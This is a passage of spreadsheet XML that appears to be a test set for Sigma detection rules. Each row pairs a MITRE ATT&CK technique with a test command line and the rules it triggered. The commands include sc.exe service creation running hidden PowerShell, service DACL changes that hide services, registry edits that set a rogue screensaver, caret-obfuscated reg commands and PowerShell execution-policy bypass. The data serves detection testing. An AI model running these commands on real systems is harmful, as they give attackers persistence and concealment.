      </c>
      <c r="I378" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J378" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K378" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B379" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C379" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D379" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E379" s="43" t="inlineStr">
        <is>
          <t>sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto</t>
        </is>
      </c>
      <c r="F379" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J379" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K379" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B380" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C380" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D380" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E380" s="43" t="inlineStr">
        <is>
          <t>sc.exe create ARTService binPath= "C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"</t>
        </is>
      </c>
      <c r="F380" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J380" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K380" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B381" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C381" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D381" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E381" s="43" t="inlineStr">
        <is>
          <t>sc create MyService binpath= "calc.exe"</t>
        </is>
      </c>
      <c r="F381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J381" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K381" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B382" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C382" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D382" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E382" s="43" t="inlineStr">
        <is>
          <t>sc create TestService binPath= "C:\\Windows\\System32\\cmd.exe /C echo BypassTest &gt; \\\\.\$$pipe\\TestPipe" type= own start= demand</t>
        </is>
      </c>
      <c r="F382" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J382" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K382" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B383" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C383" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D383" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E383" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name TestService -BinaryPathName 'C:\\Windows\\System32\\notepad.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F383" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I383" s="4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383" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K383" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B384" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C384" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D384" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E384" s="43" t="inlineStr">
        <is>
          <t>sc.exe create TestService binPath= "C:\\Windows\\System32\\svchost.exe -k NetworkService" type= share start= auto</t>
        </is>
      </c>
      <c r="F384" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I384" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J384" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B385" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C385" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D385" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E385" s="43" t="inlineStr">
        <is>
          <t>sc.exe create TestService binPath= "C:\\Windows\\System32\\cmd.exe /C echo Test &gt; C:\\Windows\\Temp\\test.txt" type= own start= auto</t>
        </is>
      </c>
      <c r="F385" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I385" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J385" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K385" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B386" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C386" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D386" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E386" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name TestService -BinaryPathName 'C:\\Windows\\System32\\calc.exe' -StartupType Automatic"</t>
        </is>
      </c>
      <c r="F386" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using PowerShell (c02e96b7-c63a-4c47-bd83-4a9f74afcfb2); New Service Creation Using PowerShell (c02e96b7-c63a-4c47-bd83-4a9f74afcfb2)</t>
        </is>
      </c>
      <c r="J386" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K386" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B387" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C387" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D387" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E387" s="43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387" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I387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387" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K387" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B388" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C388" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D388" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E388" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DCLCWPDTSD;;;IU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)</t>
        </is>
      </c>
      <c r="F388" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I388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388" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K388" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B389" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C389" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D389" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E389" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DC;;;IU)(D;;LC;;;IU)(D;;WP;;;IU)(D;;DT;;;IU)(D;;SD;;;IU)</t>
        </is>
      </c>
      <c r="F389" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G389" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I389" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J389" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K389" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B390" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C390" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D390" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E390" s="43" t="inlineStr">
        <is>
          <t>sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)</t>
        </is>
      </c>
      <c r="F390" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I390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390" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K390" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B391" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C391" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D391" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E391" s="43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391" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I391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391" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K391" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B392" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C392" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D392" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E392" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F392" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I392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392" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K392" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B393" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C393" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D393" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E393" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F393" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J393" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K393" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B394" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C394" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D394" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E394" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F394" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J394" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K394" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B395" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C395" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D395" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E395" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v ShellSmartScreenLevel /t REG_SZ /d Block /f</t>
        </is>
      </c>
      <c r="F395" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J395" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K395" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B396" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C396" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D396" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E396" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\S^OFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTime /t REG_DWORD /d 10 /f</t>
        </is>
      </c>
      <c r="F396" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J396" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K396" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B397" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C397" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D397" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E397" s="43" t="inlineStr">
        <is>
          <t>reg.exe   add "HKEY_CURRENT_USER\Control Panel\Desktop"  /v ScreenSaveActive  /t REG_SZ  /d 1  /f</t>
        </is>
      </c>
      <c r="F397" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I397" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe (0fc35fc3-efe6-4898-8a37-0b233339524f)</t>
        </is>
      </c>
      <c r="J397" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K397" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B398" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C398" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D398" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E398" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f</t>
        </is>
      </c>
      <c r="F398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe (0fc35fc3-efe6-4898-8a37-0b233339524f)</t>
        </is>
      </c>
      <c r="J398" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K398" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B399" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C399" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D399" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E399" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control Panel\Desktop /v ScreenSaveTimeout /t REG_SZ /d 60 /f</t>
        </is>
      </c>
      <c r="F399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe (0fc35fc3-efe6-4898-8a37-0b233339524f)</t>
        </is>
      </c>
      <c r="J399" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K399" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B400" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C400" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D400" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E400" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\\WINDOWS\\System32\\evilscreensaver.scr" /f</t>
        </is>
      </c>
      <c r="F400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe (0fc35fc3-efe6-4898-8a37-0b233339524f)</t>
        </is>
      </c>
      <c r="J400" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K400" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B401" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C401" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D401" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E401" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe -sta "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"</t>
        </is>
      </c>
      <c r="F401" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects (f1edd233-30b5-4823-9e6a-c4171b24d316); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J401" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K401" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B402" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C402" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D402" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E402" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F402" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G402" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J402" s="43" t="n"/>
      <c r="K402" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B403" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C403" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D403" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E403" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
